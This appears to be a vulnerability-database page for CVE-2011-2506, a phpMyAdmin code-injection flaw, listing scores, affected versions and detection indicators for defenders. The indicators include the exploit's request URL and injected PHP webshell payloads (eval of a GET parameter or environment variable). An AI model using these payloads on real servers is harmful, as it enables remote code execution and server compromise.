cbcvebase.
CVE-2011-2506
published 2011-07-14

CVE-2011-2506: setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing…

PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.63%
94.9th percentile
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.

Affected

41 ranges· showing 25
VendorProductVersion rangeFixed in
debianphpmyadmin< phpmyadmin 4:3.4.3.1-1 (bookworm)phpmyadmin 4:3.4.3.1-1 (bookworm)
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin
phpmyadminphpmyadmin

Detection & IOCsextracted from sources · hover to see the quote

pathsetup/lib/ConfigGenerator.class.php
path/setup/config.php
path/config/config.inc.php
url/?_SESSION[ConfigFile][Servers][*/foreach($_GET as $k=>$v)if($k==="eval")eval($v);/*][port]=0&session_to_unset=x&token=<token>
commandforeach($_GET as $k=>$v)if($k==="eval")eval($v);
hash202cb962ac59075b964b07152d234b70
commandeval(getenv('HTTP_CODE'));
  • Detect exploitation attempts by monitoring HTTP requests containing '_SESSION[ConfigFile][Servers][*/' in the query string, which is the session poisoning vector used to inject PHP code between comment delimiters.
  • Alert on POST requests to /setup/config.php with the parameter 'submit_save=Save', which triggers writing the injected code to the config file on disk.
  • Alert on GET requests to /config/config.inc.php with an 'eval' query parameter, which is the webshell execution step after successful code injection.
  • Presence of the MD5 hash 202cb962ac59075b964b07152d234b70 (md5(123)) in HTTP responses from /config/config.inc.php is a reliable indicator of successful code injection exploitation.
  • Monitor for creation or modification of the file config/config.inc.php within the phpMyAdmin web root, as the exploit writes injected PHP code to this path.
  • The exploit requires the 'config' directory to be web-server writable; absence of this directory causes the exploit to abort. Monitor for creation of this directory as a pre-exploitation indicator.
  • ·Exploitation requires the web server to have write access to the 'config/' subdirectory within the phpMyAdmin installation. If this directory does not exist or is not writable, the exploit will fail.
  • ·Affected versions are phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1; versions at or above these are patched.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.